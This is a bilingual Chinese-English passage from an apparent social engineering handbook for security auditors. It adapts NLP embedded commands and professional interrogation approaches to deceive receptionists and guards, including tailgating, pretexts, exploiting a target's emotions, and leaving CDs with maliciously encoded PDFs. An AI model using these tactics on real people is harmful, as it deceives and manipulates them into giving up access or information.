When you speak a sentence in which you want to include a hidden command, and you want to lower your tone, being so subtle that the target doesn’t realize it is imperative. Otherwise, you will alert that person’s subconscious to trigger that something is amiss. If that occurs he may pick up on your attempts thereby shutting down your success.

 

就像社会工程学中的大多数事情一样,如果一种技巧不是自然而然产生的,那么练习是必不可少的。在审计中尝试这种发声技巧之前,请先在您的家人和朋友身上尝试一下。

Like most things in social engineering, if a technique doesn’t come naturally, practice is essential. Try this voice technique on your family and friends before you ever attempt it in an audit.

 

从个人经验来看,当我第一次开始研究 Ultimate Voice 技术时,我的目标是将命令嵌入问题中。这个目标需要一段时间才能实现,但我会尝试一些简单的事情,例如:

From personal experience, when I first started working on the Ultimate Voice techniques I decided my goal was to embed commands into questions. This goal took a while to realize but I would try simplistic things like:

 

“亲爱的,今天晚上你想吃什么,牛排还是别的什么?”

“Honey, what do you want to eat for dinner tonight, steak or something else?”

 

总结本节,请考虑社会工程师在研究 NLP 时应该关注的三件事:

To conclude this section, consider three things a social engineer should focus on when studying NLP:

 
 
     
  • 声调。如前所述,您的声调以及对某些单词的强调可以改变整个句子的含义。使用声调和强调,您可以将命令嵌入目标的潜意识中,并使目标更容易接受建议。
  • Vocal tones. As stated previously, the tones of your voice as well as the emphasis you put on certain words can change the whole meaning of a sentence. Using tone and emphasis, you can embed commands inside of the subconscious mind of the target and allow the target to be more open to suggestion.
  •  
     
  • 谨慎选择用词。学会选择最有影响力的词语。将积极的词语与你希望目标积极思考的想法相匹配,将消极的词语与你希望他们不会太过重视的想法相匹配。这种技巧还可以帮助社会工程师让目标变得更加柔顺。
  • Chose your words carefully. Learn to choose the words that have maximum impact. Match positive words with thoughts you want the target to think positively on and negative words with those you want them to not think of too highly. This technique can also help the social engineer make a target more pliable.
  •  
     
  • 创建一份命令语句列表,您可以在现场或电话社会工程审计期间使用它们。写出并练习命令语句将有助于您在需要时回忆和使用它们。
  • Create a list of command sentences that you can use in person or during a phone social engineering audit. Writing out and practicing command sentences will help you be able to recall and use them when in need.
  •  
 

最重要的是练习。控制你的声调、你选择的词语以及你说话的方式不是一件容易的事。练习可以让这成为你的第二天性。

Most of all, practice. Controlling your vocal tones, the words you choose, and how you say them is not an easy task. Practice can make this become second nature.

 

NLP 是一个强大的主题,与微表情非常相似,本节只是触及了表面。一旦您开始掌握 NLP 中的技术和阅读面部表情的能力,下一步就是在与目标互动时使用这些工具。接下来,本章分析了专业审讯人员使用的相同策略。

NLP is a powerful topic, and, much like microexpressions, this section only scratched the surface. Once you start to master the techniques in NLP and the ability to read facial expressions, a next logical step is using these tools when interacting with a target. Next, this chapter analyzes the same tactics professional interrogators use.

 

面谈和审讯

Interview and Interrogation

 

情景 1:门突然打开,行凶者明显很紧张。坏心情队长走过来,抓住罪犯的衣领,把他猛地按在墙上。他离罪犯的脸只有一英寸远,尖叫道:“不管怎样,你都会告诉我我想知道的事情!”

Scenario 1: The door flies open and the perpetrator is noticeably nervous. Captain Bad-Mood comes over and grabs the perp by the collar and slams him up against the wall. Getting about an inch from his face he screams, “You’ll tell me what I want to know, one way or another!”

 

场景2:坏人被绑在一把椅子上,已经因为之前30分钟的殴打而伤痕累累,审讯者抓起一把闪闪发亮的钳子说:“你马上就会说话了……”

Scenario 2: The bad guy is tied to a chair, already bruised from the previous 30 minutes of beatings, and as the interrogator grabs a pair of shiny pliers he says, “You’ll be talking in no time….”

 

场景 3:罪犯坐在椅子上,两名警察走进房间。他们平静地走到桌子旁,把一份标有“证据”的文件放在桌子上。坐下前,他们问:“你需要咖啡、苏打水还是别的什么吗?”

Scenario 3: The perp is sitting in a chair and two police officers enter the room. Calmly they walk over to the table and set a file labeled “Evidence” down on the table. Before they sit down they ask, “Do you need a coffee or a soda or something?”

 

副驾驶打开一瓶冰镇苏打水说道:“感谢您今天前来帮助我们……”

Cracking open an ice-cold soda the first officer says, “Thanks for coming in today to help us out….”

 

上述哪种情况是现实生活中的审讯?如果你猜的是第三个,那你就猜对了。这就是真正的审讯通常进行的方式。前两种情况在好莱坞电影和电视剧中被多次描绘,以至于我们很多人可能认为它们是真实的。除了战时情况和不禁止使用酷刑的国家外,第三种情况很可能是大多数审讯的开始方式。

Which one of the preceding scenarios is a real-life interrogation? If you guessed the third one, you’re right. It is how a real interrogation often goes. The first two have been portrayed in Hollywood movies and television series so much that many of us might think they are real. Outside of wartime scenarios and nations that do not ban the use of torture, the third scenario is most likely the way most interrogations begin.

 

作为一名社会工程师,你很少会遇到这样的情况:你的目标在房间里等着你询问他。考虑到这一点,你可能会问,作为一名社会工程师,你如何使用专业审讯人员和采访人员的策略?

Rarely will you as a social engineer be in a situation where your target is waiting in a room for you to question him. With that in mind, you might ask, how can you use the tactics of professional interrogators and interviewers as a social engineer?

 

在进一步了解之前,您应该了解审讯和面试之间的区别。下表列出了其中一些区别,但这个话题有许多不同的角度、观点和意见,因此可能存在更多区别。

Before going further you should know the differences between an interrogation and an interview. The following table presents some of these differences, but this topic has many different angles, viewpoints, and opinions, so more could exist.

 
面试 审讯
主题讲,你听。 您与主题讨论他的陈述。
主题引导谈话的方向;你澄清他的陈述并倾听,然后运用 NLP 技能。 您引领方向。在此应用 NLP 技能。

不带有指责性。 指责性的。
性情柔软。 性情坚硬。
主体位置,主体安逸。 审讯室,当事人很紧张。
您收集信息(谁、什么、何时、何地、为什么和如何)。 如果你透露某些信息,你就能了解详细信息。
调查初期。 最后的审讯环节。
 

面谈与审讯的主要区别在于,面谈是在目标人物身心都感到舒适的氛围中进行的,而审讯的目的是通过对地点或所提问题造成目标人物的不适来对其施加压力,以获得目标人物的供词或所掌握的一些知识。

The main difference between an interview and interrogation is that an interview is in an atmosphere where the target is comfortable both physically and psychologically, whereas in an interrogation the goal is to put some pressure on the target by creating discomfort with the location or the questions asked, with the goal of gaining a confession or some knowledge the target possesses.

 

良好的审讯是一门艺术,你可以通过经验掌握。许多社会工程学技能都与成为一名优秀的审讯员有关。诸如诱导(见第 3 章)、读懂人、面部表情和手势以及洞察人类行为等技能都可以帮助你成为一名传奇的审讯员。

Good interrogation is an art that you can master through experience. Many social engineering skills tie into to being a good interrogator. Skills like elicitation (see Chapter 3); reading people, faces, and gestures; and having insight into human behavior can all help you become a legendary interrogator.

 

采访是一项很棒的技能,但只要您能掌握诱导法,您就可以擅长进行采访。

Interviewing is a great skill to have, but as long as you can master the use of elicitation you can become great at conducting interviews.

 

成功的社会工程师广泛使用审讯原则。让目标处于某种心理或生理不适状态,以便更容易地从他们那里收集信息,这是大多数社会工程师会花大量时间掌握的技能。

Interrogation principles are used widely by successful social engineers. Putting a target in some psychological or physical discomfort to make gathering information from them easier is a skill most social engineers will spend a considerable time obtaining.

 

专业审讯策略

Professional Interrogation Tactics

 

在进行任何采访或审讯之前,社会工程师需要进行彻底的信息收集。您必须尽可能多地获取有关目标、公司、情况以及每项细节的信息。您必须知道如何接近目标以及要说什么,并牢记与目标相处的路径。在对话和初步接触期间,请仔细观察周围环境以及目标的任何变化。

Before conducting any interview or interrogation, the social engineer will need to have done thorough information gathering. You must obtain as much information about the target, the company, the situation, and details of each as possible. You must know how to approach a target and what to say, and have in mind the path you will take with the target. Be careful to observe your surroundings as well as any changes in the target during the conversation and initial approach.

 

初次接触面试和审讯的人常犯的一个错误是,认为每个行为变化都有重大意义。目标交叉双臂并不仅仅意味着封闭的想法;她也可能感到寒冷、腋下有异味或因你的问题而感到压力增加。

One of the mistakes people new to interviewing and interrogation make is assuming every behavioral change has major meaning. A target’s crossing her arms doesn’t just mean a closed thought; she could also be cold, have underarm stink, or feel increased stress because of your questions.

 

不要只注意一种迹象,而要注意一组迹象。例如,目标交叉双臂、转动头部并将双脚平放在地板上。这是一个封闭的人;换句话说,她的肢体语言表明她不会再透露任何信息或不再合作——这扇门已经关闭。一组变化是需要注意的最重要的事情,因此请注意发生这组变化时正在讨论的话题。

Watch not for only one sign; watch for groups of signs. For example, a target crosses her arms, turns her head, and places her feet flat on the floor. This is a closed person; in other words, her body language indicates that she will divulge no more information or cooperate any longer—this door has been shut. A group of changes is the most important thing to watch for, so note the topic that was being discussed when the group of changes occurred.

 

在开始采访或审讯时,需要观察采访对象的变化:

When starting an interview or interrogation here are areas to observe for changes in the subject:

 
 
     
  • 身体姿势:直立、弯腰、倾斜
  • Body posture: Upright, slumped, leaning away
  •  
     
  • 肤色:苍白、红色、白色、变化
  • Skin color: Pale, red, white, changes
  •  
     
  • 头部位置:直立、倾斜、前倾/后仰
  • Head position: Upright, tilted, forward/back
  •  
     
  • 眼睛:方向、开放
  • Eyes: Direction, openness
  •  
     
  • 手/脚:动作、位置、颜色
  • Hands/feet: Movement, position, color
  •  
     
  • 嘴巴/嘴唇:位置、颜色、上扬/下垂
  • Mouth/lips: Position, color, turned up/down
  •  
     
  • 主要感觉:视觉、听觉、动能、感觉
  • Primary sense: Visual, aural, kinetic, feeling
  •  
     
  • 声音:音调、语速、变化
  • Voice: Pitch, rate, changes
  •  
     
  • 单词:短、长、音节数、功能障碍、停顿
  • Words: Short, long, number of syllables, dysfunctions, pauses
  •  
 

变化可能表明需要更多关注某个问题或一系列问题。例如,如果你问“CEO 先生在吗?我想把这份信息包留给他审阅”,身体姿势非常放松,然后身体姿势变为防御姿势——躯干指向别处,眼睛避开看你——这可能是一个很好的迹象,表明接下来会有一些谎言,进一步的提问可能会揭示这个话题的真相。

Changes can indicate a question or line of questioning that needs more attention. For example, if the body posture is very relaxed when you ask, “Is Mr. CEO in? I would like to leave this information packet for his review,” and then the body posture changes to a defensive posture—the torso pointing away and the eyes averting from looking at you—it may be a good indication that there is some untruth coming up and further questioning might reveal the truth on this topic.

 

尤其要注意目标人物的用词。在采访或审讯过程中,要特别注意目标人物的语气和回答问题的方式。当你问一个问题时,她需要多长时间才能回答?快速脱口而出答案被认为是练习答案的标志。如果她花了太长时间,也许她正在思考答案。不过,反应时间因人而异,因为你必须确定每个人的“自然”反应时间。

Especially be sure to pay attention to the words a target uses. During the interview or interrogation process, pay particular attention to the subject’s voice and how she answers questions. When you ask a question, how long does it take for her to answer? Blurting out answers quickly is believed to be a sign of practicing the answer. If she takes too long, maybe she was thinking up the answer. Response time depends on each person, though, because you have to determine what is “natural” for each person.

 

在社会工程工作中,确定目标的自然特征(即基线)并非小事,必须快速完成。敏锐的观察力是成功运用这项技能的关键。创建基线的一种方法涉及提出问题,这些问题会激活嫌疑人的大脑的不同部分。审讯者会提出一些需要简单记忆的无威胁性问题和需要创造性思维的问题。然后寻找大脑激活记忆中心的外在表现,例如微表情或肢体语言提示。

Determining what is natural in a target (that is, the baseline) is not a small matter in a social engineering gig and must be done very fast. Being very observant is the key to success with this skill. One method of creating a baseline involves asking questions that cause the suspect to access different parts of his brain. The interrogator asks nonthreatening questions that require simple memory and questions that require creative thinking. Then look for outward manifestation of his brain activating the memory center, such as microexpressions or body language cues.

 

另一个需要注意的方面是动词时态和代词用法的变化。这些从过去时态到将来时态的变化表明您可能需要进一步调查。转换时态可能表明欺骗。当目标转换时态时,他们可能在编造答案或思考过去的陈述来编造答案。进一步的询问也可以揭示真相。您应该注意的其他变化领域是声音的音调(是否随着重音而升高?)和说话的速度。

Another area to listen for is changes in verb tense and pronoun use. These shifts from past tense to future tense show areas you might want to investigate further. Switching tense can indicate deception. When a target switches tense they may be fabricating an answer or thinking of a past statement to fabricate an answer. Further questioning can reveal the truth here also. Other areas of change you should listen to are the pitch of the voice (is it going up with stress?) and the speed of speaking.

 

你不必同时学会如何做到这一切。你积极倾听和观察他人的练习越多,你就越容易不假思索地做到这一点。

You don’t have to learn how to do all this at the same time. The more practice you get actively listening and observing people the easier it becomes for you to do it without thinking.

 

专业审讯由多个部分组成。以下各节将逐一讨论,并说明其与社会工程师的关系。

Professional interrogation is comprised of a number of parts. The following sections discuss each one, in the context of how it pertains to a social engineer.

 

积极对抗

Positive Confrontation

 

在执法中,积极对抗并不意味着任何积极和好的事情;相反,它意味着警官正在告诉嫌疑人他就是犯罪者;换句话说,警官正在提出强烈的指控。然而,在社会工程审计中,你已经确定了你想要的“目标”,现在你要告诉(可能使用前面提到的 NLP 策略)那个目标,他会按照你的要求去做。

In law enforcement positive confrontation doesn’t mean anything positive and good; on the contrary, it means the officer is telling the suspect he is the one who committed the crime; in other words, the officer is making a strong accusation. In a social engineering audit, though, you already have identified the “target” you want and now you are going to tell (maybe using the NLP tactics previously mentioned) that target that he will do what you are asking of him.

 

你与目标面对面,目的是让他开始按照你的意愿行事。例如,社会工程师可能会走近接待员并询问:“CEO 先生在吗?我要和他开会。”或者,使用积极对抗的角度,“我在这里,上午 11 点与 CEO 先生会面。”请注意,第二个例子积极地表明会议已经安排好、在意料之中,并且你确信它正在发生。

You confront the target with the objective of starting him on the path to doing what you want. For example, a social engineer may approach the receptionist and ask, “Is Mr. CEO in? I have a meeting with him.” Or, to use a positive-confrontation angle, “I am here for my meeting with Mr. CEO at 11 am.” Notice the second example positively states the meeting as being set, expected, and in such a way that you are sure it is happening.

 

主题开发

Theme Development

 

警方审讯中的主题发展是指审讯人员编造一个故事来推测嫌疑人可能犯罪的原因。审讯过程中,很多时候都会向嫌疑人讲述这个故事。“所以他侮辱了你,你非常生气,抓起管子开始用它敲打他的挡风玻璃。”当警官讲述这个故事时,他或他的搭档会观察嫌疑人的肢体语言和微表情,看看是否有任何线索可以表明他同意。

Theme development in police interrogations is when the interrogator develops a story to postulate why the suspect may have committed a crime. Many times that story is relayed to the suspect during the interrogation. “So he insulted you and you got so mad, you grabbed the pipe and began hitting his windshield with it.” While the officer is telling the story, he or his partner is watching the body language and microexpressions of the suspect to see if there are any clues that would constitute agreement.

 

虽然社会工程师可以使用这种方法,但我还想指出,从社会工程学的角度来看,主题开发需要从目标的角度看待你的借口。“技术支持代表”、“经理”或“同事”会是什么样子、说什么、做什么?他会如何表现?

Although social engineers can use this method, I also like to state that from a social engineering viewpoint, theme development needs to be seeing your pretext from the eyes of the target. What would a “tech support rep,” “manager,” or “fellow employee” look like, say, and do? How would he act?

 

对于社会工程师来说,主题发展是指您展示的支持证据直接与您所描绘的主题相吻合。无论是通过电话还是亲自接近目标,您通常都会使用某种借口。当然,借口可以支持您的故事情节或主题。在审讯的这一部分,您可以提供借口的理由或支持(请参阅第 4 章以重新了解借口)。

Theme development for social engineers is when your supporting evidence that is displayed feeds directly into the theme of who you are portraying. Your approach to a target, whether on the phone or in person, often involves a pretext of some sort. The pretext, of course, supports your storyline or theme. This part of the interrogation is where you offer reasons or support for the pretext (see Chapter 4 for a refresher on pretexting).

 

例如,在一次审计中,我的借口很简单——我只是一名本职员工。我拿着从垃圾堆里找到的一份行业刊物,跟着几名员工穿过门,经过保安。当我们走近保安时,我开始与其中一名员工就期刊上的一篇文章进行非常简单的交谈。我的所有行为都有助于主题的发展。你的目标是让那些通常会阻止你不做工作的人有理由这样做。

For example, in one audit my pretext was very simple—I was just an employee who belonged. Armed with a trade publication I found in the trash, I followed a few employees through the door and past the security guard. As we approached the security guard I began a very simple conversation with one of the employees about an article in the journal. All of my actions contributed to theme development. Your goal is to give the people who would normally stop you justification for not doing their job.

 

你越融入其中,就越不显眼,保安之类的人就越容易找到理由不拦着你、不让你进去。

The more you fit in, the less you stand out, and the easier it is for security guards and the like to justify not stopping you and letting you in.

 

处理否认和克服异议

Handling Denials and Overcoming Objections

 

无论是通过电话还是亲自见面,如果您被拒绝进入您正在寻找的地方或获取信息,该怎么办?我喜欢称这些为谈话终结者。人们总是对销售人员使用它们,“我不感兴趣。”“我现在没时间。”“我刚要离开……”

Whether on the phone or in person, what is the plan of action if you are denied access to the place or information you are seeking? I like to call these conversation stoppers. People use them with salespeople all the time, “I’m not interested.” “I don’t have time right now.” “I was just leaving….”

 

无论目标抛出什么样的阻止措施,你都必须有一个计划来克服它并处理拒绝访问的问题。如果我觉得情况需要,我喜欢先发制人地驳回反对意见。

Whatever flavor of stopper targets throw out, you must have a plan to overcome it and handle the denial of access. I like to preemptively dismiss objections if I feel the situation warrants.

 

我在做销售的时候,曾与一个叫托尼的人共事,他有一种策略,就是敲门并自我介绍,然后不停地说道:“我知道你可能想说你不感兴趣,但在你这么说之前,你能回答这个问题吗:你花五分钟的时间值 500 美元吗?”

When I was in sales, I worked with a man named Tony who had a tactic that involved knocking on a door and introducing himself, and without pausing saying, “I know you might want to say you are not interested, but before you do, can you answer this one question: Is five minutes of your time worth $500?”

 

此时,对方不太可能说“我不感兴趣”。通过减少拒绝的可能性并提出问题,托尼能够让目标除了反对之外还考虑其他事情。

At this point, the person was much less likely say, “I’m not interested.” By diminishing the possibility of denial and following up with a question, Tony was able to get the target to think about something else besides her objection.

 

在社会工程活动中,你不能走到保安面前说:“我知道你不想让陌生人进门,但是……”因为这会引起太多的怀疑。使用这种方法来克服反对意见对社会工程师来说要复杂得多。

In a social engineering engagement you can’t walk up to the security guard and say, “I know you don’t want to let strange people in the door but…” because it would raise way too much suspicion. Using this methodology to overcome objections is much more complex for social engineers.

 

你必须考虑可能出现哪些反对意见,并组织好你的主题、故事、服装和人物来预先消除这些反对意见。然而,当反对意见出现时,你仍然需要有一个好的答案。你不能直接跑出门或挂断电话。一个好的退出策略可以让你稍后再回来进攻。

You have to think about what objections might arise and organize your theme, story, dress, and person to pre-empt those objections. Yet you still have to have a good answer to give for when objections come up. You can’t just run out the door or hang up the phone. A good exit strategy enables you to come back to attack later on.

 

退出策略可以很简单,例如:“好吧,女士,很抱歉您不让我去见史密斯先生。我知道他会非常失望,因为他一直在等我,但我稍后会给他打电话并安排另一个约会。”

An exit strategy can be as simple as, “Well, ma’am, I’m sorry you won’t let me in to see Mr. Smith. I know he will be greatly disappointed because he was expecting me, but I will give him a call later and set up another appointment.”

 

吸引目标的注意力

Keeping the Target’s Attention

 

如果您到目前为止正确地处理了社交工程行动,并且您已经站在目标面前,那么目标可能会开始思考如果她不允许访问、拿走文件或按照您的要求做会发生什么。您需要利用这种内在的恐惧,并利用它继续将目标推向目标。

If you handled your social engineering move correctly up to this point and you are in front of the target, then the target may start to think about what would happen if she does not allow access, take the file, or do what you are asking. You need to feed off of that inherent fear and use it to continue to move the target to your goal.

 

一些简短的陈述,例如:“感谢您的帮助。我对这次面试非常紧张,显然我在日历上记错了日期。我希望人力资源经理女士在比这里更温暖的地方?” 允许回复,然后继续说:“我想感谢您的帮助。她什么时候回来,这样我就可以打电话预约另一个时间?”

A few short statements like, “Thank you for your help. I was so nervous about this interview that I obviously put the wrong date down in the calendar. I hope that Mrs. HR Manager is some place warmer than here?” Allow for a response then continue, “I want to thank you for your help. When will she be back so I can call to make another appointment?”

 

提出替代路线

Presenting an Alternate Route

 

当您在社会工程审计中询问目标时,您的第一条路径很可能不会受到欢迎,因此准备一条较小但同样有效的行动路径是个好主意。

When you are interrogating the target in a social engineering audit, the possibility exists that your first path will not be greeted with smiles, so having a lesser but just as effective path of action ready is a good idea.

 

也许你已经用尽了所有这些策略,试图让接待员莎莉让你进去见史密斯先生。这些策略都失败了,你被拒绝了。你应该准备一条替代路径,例如,“莎莉,我明白你必须确保事情只在预约后才能完成。我只是不确定我什么时候会再来这个地区。我可以将这张史密斯先生的信息 CD 留给你,然后我明天可以打电话跟进,看看他是否会安排预约?”

Maybe you have used all these tactics to try to get Sally, the receptionist, to let you in to see Mr. Smith. The tactics are all failing and you are being shut down. You should have an alternative path prepared, such as, “Sally, I appreciate you have to make sure things are done by appointment only. I am just not sure when I will be back through the area. Can I leave you with this CD of information for Mr. Smith and then I can follow up with a phone call tomorrow to see whether he will set up an appointment?”

 

准备几张含有恶意编码的 PDF 的 CD 可以帮助实现这条路径,以及快速练习和使用审讯策略。

Having a few CDs prepared with some maliciously encoded PDFs can help to make this path a reality, as well as having practiced and then using interrogation tactics quickly.

 

我的一个联系人给我发了一份文件,名为“采访和审讯”,国防部用它来训练员工通过测谎仪。它概述了专业审讯人员使用的不同方法,我在这里提供了这些方法。通过研究这些不同的方法,我们可以学到很多对社会工程师来说可能有意义的不同方法。
 
     
  • 直接方式:审讯员在这种方式中表现出自信。审讯员的态度和方式排除了嫌疑人是无辜的。审讯员不威胁,而是告诉嫌疑人其他人也会做同样的事情,从而解除嫌疑人的戒心。
  • Direct approach: The interrogator assumes an air of confidence in this approach. The attitude and manner of the interrogator rules out that the suspect is innocent at all. Without threatening, the interrogator disarms the suspect by telling him anyone else would have done the same thing.
  •  
 

 

作为一名社会工程师,您可以根据自己的借口使用这种方法。也许您是管理层、顾问或对目标有权力的其他人。这意味着您必须充满信心,并认为目标“欠”您一个您想要的回应。
 
     
  • 间接方式:让嫌疑人详细陈述自己的情况,审讯人员则寻找遗漏、矛盾和歪曲之处。审讯人员的工作是让嫌疑人知道,最好的做法是说实话。
  •  
 

As a social engineer, you can utilize this approach depending on your pretext. Maybe you are management, a consultant, or another person who has power over the target. This means you must have an air of confidence and assume that the target “owes” you the response you seek.
 
     
  • Indirect approach: The suspect is allowed to tell his side of the story in detail and the interrogator looks for omissions, discrepancies, and distortions. The interrogator’s job is to let the suspect know that the best course of action is to tell the truth.
  •  
 

 
 

作为一名社会工程师,你可以使用这种方法,不以任何角色接近目标,而是作为一种诱导,一个旨在从目标那里获取信息的问题。社会工程师可以通过让目标说大部分话来收集信息。
 
     
  • 同情方法:国防部手册对这种方法提出了一些很好的想法。审讯人员放低声音,用低沉、安静的语调说话,给人留下他是一个善解人意的人的印象。他坐在嫌疑人附近,也许把手放在嫌疑人的肩膀上或拍拍他的胳膊。在适当的时候进行身体接触非常有效。
  •  
 

As a social engineer you can use this approach by not approaching the target in any role, but maybe as an elicitation, a question designed to elicit information from the target. The social engineer can gather information from the target by letting him do most of the talking.
 
     
  • Sympathetic approach: The DOD manual offers some excellent thoughts on this approach. The interrogator drops his voice and talks in a lower, quieter tone that gives the impression he is an understanding person. He sits close to the suspect and maybe puts his hand on the suspect’s shoulder or pats him on the arm. Physical contact at the right time is very effective.
  •  
 

 
 

社会工程师可以像审讯者一样使用这种方法。也许你在等着进门时无意中听到一些员工抱怨老板。或者你跟着目标去了当地的酒吧,并进行了一次谈话,在谈话中你可以表达对某种情况的同情。你可以在任何地方使用这种方法,而且它非常有效。
 
     
  • 情感方法:这种方法利用嫌疑人的道德或情感。这种审讯策略会使用诸如“你的妻子或孩子会怎么想?”之类的问题。激起的情绪会让他不安和紧张;当这些情绪表现出来时,审讯者可以利用它们。
  •  
 

The social engineer can use this approach in the very same manner as the interrogator. Maybe you overhear some employees complaining about the boss as you are waiting to tailgate in the door. Or maybe you have followed the target to the local bar and get into a conversation where you can show empathy to a situation. You can use this approach all around, and it is very effective.
 
     
  • Emotional approach: This approach plays on the morals or emotions of the suspect. Questions such as, “What will your wife or kids think about this?” are used in this interrogation tactic. The thoughts that are aroused emotionally upset him and make him nervous; as these emotions manifest themselves, the interrogator can capitalize on them.
  •  
 

 
 

你可以用与上一种方法类似的方式使用这种方法,利用目标身上发现的弱点。在一次交战中,我知道目标偏向于为患癌症的儿童提供慈善服务。利用这些情绪,我能够让目标采取他不应该采取的行动,从而损害他的行动。
 
     
  • 逻辑方法:这种非情绪化方法能提供强有力的有罪证据。审讯人员应端正坐姿,严肃认真,表现出自信。
  •  
 

You can use this approach in a similar manner to the preceding, in which you play on a weakness identified in the target. In one engagement, I knew the target was partial to charities for children who suffer from cancer. Playing on those emotions I was able to get the target to take an action he should not have taken, and it compromised his operation.
 
     
  • Logical approach: This non-emotional approach presents strong evidence of guilt. The interrogator should sit erectly and be business-like, displaying confidence.
  •  
 

 
 

你可以使用这种实事求是的方式提供证据来证明你在场的正当理由 — — 例如,穿着 IT 修理工的服装并携带武器,并且表现出你属于那里的自信。
 
     
  • 咄咄逼人:对于审讯者来说,收集信息和侵犯目标权利之间存在一条不可逾越的界限。审讯者应该提高声音,并且外表和行为应该咄咄逼人,但绝不能侵犯嫌疑人的公民权利。
  •  
 

You can use this matter-of-fact approach when presenting evidence of your legitimate reasons for being present—for example, such as being dressed and armed as an IT repairman and having the air of confidence that you belong there.
 
     
  • Aggressive approach: For an interrogator, a fine line exists between gathering information and infringing on the target’s rights that must not be crossed. The voice should be raised, and the look and act should be aggressive, but the suspect’s civil rights should never be violated.
  •  
 

 
 

社会工程审计员需要牢记这条界限。正如第 4 章讨论的惠普案例一样,受雇对公司进行社会工程并不意味着你有权违反民法。大多数情况下,雇用你的公司无权允许你窃听家庭电话、阅读私人电子邮件或侵犯他人隐私。
 
     
  • 组合方法:一名审讯人员可以组合两种方法以达到最佳效果。这将根据嫌疑人的个性决定。
  •  
 

The social engineer auditor needs to keep this fine line in mind. As in the case of Hewlett-Packard, discussed in Chapter 4, being hired to social engineer a company does not give you the right to break civil laws. Most of the time the company hiring you has no right to allow you to tap home phones, read personal e-mails, or invade people’s privacy.
 
     
  • Combination approach: One interrogator may combine two approaches to have maximum effect. This would be decided upon based on the suspect’s personality.
  •  
 

 
 

作为一名社会工程师,你可以使用同样的技巧——结合你的攻击和方法以获得最大效果。例如,在你发现目标的一些个人信息(例如他们最喜欢的当地酒吧)后,你可以接近目标并开始交谈。这种策略,尤其是在轻松的氛围中使用时,可以大大有助于打开人们的心扉。
 
     
  • 漠不关心的方法:这种方法非常有趣,因为审讯人员表现得好像案件已经破获,他不需要供词。此时审讯人员可能会试图操纵嫌疑人说出他自己的说法。
  •  
 

As a social engineer you may use the same technique—combine your attacks and approaches for maximum effect. For instance, after you discover some personal details about a target—such as their favorite local bar—you can approach the target and start a conversation. Such a tactic, especially when employed in a relaxed atmosphere, can go a long way toward opening people up.
 
     
  • Indifferent approach: This approach is very interesting because the interrogator acts as if he does not need the confession because the case is solved. At that point the interrogator may try manipulating the suspect into giving his side of the story.
  •  
 

 
 

作为一名社会工程师,除非被抓住,否则你可能无法使用这种方法。如果你被困在不该去的地方或情况下,你可以表现得漠不关心,而不是害怕被抓住。表现得漠不关心可以让抓住你的人不那么惊慌,让你有机会消除任何担忧。凯文·米特尼克(有关米特尼克的更多信息,请参阅第 8 章)非常擅长这种技巧。他有快速思考的能力。此外,在处于危险境地时表现得漠不关心使他逃脱了很多惩罚。
 
     
  • 挽回面子的方法:审讯人员应合理化犯罪行为,为嫌疑人提供脱身之道和坦白以挽回面子的借口。但是,审讯人员不应将借口说得太好,以致嫌疑人可以在法庭上以此为辩护。
  •  
 

As a social engineer you may not be able to use this approach unless caught. If you’re caught in an area or situation you should not be in, you can act indifferent instead of afraid that you are caught. Acting indifferent can cause the person who caught you to not be alarmed as much and afford you an opportunity to dispel any worries. Kevin Mitnick (see Chapter 8 for more on Mitnick) was great at this technique. He had the ability to think quickly on his feet. Also, acting indifferent when he was in a precarious situation allowed him to get away with a lot.
 
     
  • Face-saving approach: The interrogator should rationalize the offense, giving the suspect a way out and an excuse to confess and save face. An interrogator should not make the excuse so good, however, that the suspect can use it in court as a defense.
  •  
 

 
 

社会工程师确实可以利用这种方法。审讯人员不想给某人一个太好的借口,但社会工程师却想。你希望借口足够好,以至于目标甚至不需要思考就可以合理化为服从你的借口。

A social engineer can really utilize this approach. An interrogator does not want to give someone too good an excuse, but a social engineer does. You want the excuse to be so good the target doesn’t even need to think before rationalizing it as an excuse for complying with you.

 
 

一种方法是说一个上级要求你去那里。你可以接着说:“我能理解你现在的感受,但我甚至不敢想象如果我不能在他周一回来之前修复这个重大的电子邮件错误,史密斯先生会多么沮丧。”这种方法让目标能够保住面子并服从。
 
     
  • 自负型方法:这种方法完全是出于自尊心。要使这种方法奏效,你需要一个对成就非常自豪的嫌疑人。吹嘘自己的英俊外表、聪明才智或犯罪方式可能会让他的自尊心得到充分满足,以至于他想坦白以表明他确实很聪明。
  •  
 

One approach is to say a higher-level person asked you to be there. You can follow this up by saying, “I can understand how you might feel now, but I don’t even want to imagine how upset Mr. Smith will be if I don’t fix that massive e-mail blunder before he returns on Monday.” This approach gives the target the ability to save face and comply.
 
     
  • Egotistical approach: This approach is all about pride. For it to work you need a suspect who is very proud of an accomplishment. Bragging on good looks, intelligence, or the way the crime was performed may stroke his ego enough that he wants to confess to show that, indeed, he was that smart.
  •  
 

 
 

在社会工程学中,这种方法经常被使用。夸大某人的成就,让他们说出最深的秘密。在美国核工程师在中国的案例中(参见第 3 章),社会工程师们对他大加赞赏,而他却说出了真相,泄露了不该知道的信息。
 
     
  • 夸大其词:如果审讯人员过分夸大案件事实,嫌疑人可能会承认事实。例如,如果审讯人员指控小偷想要强奸,并说:“否则为什么有人会在半夜闯入卧室?”这通常会导致嫌疑人承认只想偷东西,而不是强奸。
  •  
 

In social engineering gigs this method is often used. Playing up someone’s accomplishments gets them to spill their deepest secrets. In the case of the U.S. nuclear engineer in China (refer to Chapter 3), social engineers loaded the man with compliments, and he spilled the beans and divulged information he shouldn’t have.
 
     
  • Exaggeration approach: If an interrogator overexaggerates the case facts, the suspect may admit to what was real. One example would be if an interrogator accuses a thief of wanting to commit rape and saying, “Why else would someone break into a bedroom in the middle of the night?” This often causes the suspect to admit to only wanting to steal and not commit rape.
  •  
 

 
 

你也可以使用这种方法,夸大你在那里要执行的任务。通过夸大你在那里的原因,你可以给目标一个理由,让他们给你较少的访问权限。例如,你可以说,“我知道史密斯先生希望我亲自修理他的电脑,因为他丢失了很多数据,但如果你不同意,我可以从办公室的另一台电脑上解决他的问题。”
 
     
  • 提供不在场证明:嫌疑人很少一次性承认所有罪行。让他承认一些小罪行,比如他曾在现场、拥有涉案武器或拥有一辆类似的汽车,可以促使他承认更多罪行,最终导致全面认罪。
  •  
 

You can also use this approach by overexaggerating the task you are there to perform. By overexaggerating the reason for being there you can give the target a reason for providing you lesser access. For example, you can say, “I know Mr. Smith wanted me to fix his computer personally because he lost a lot of data, but if you don’t feel comfortable with that, I can potentially fix his problem from another computer in the office.”
 
     
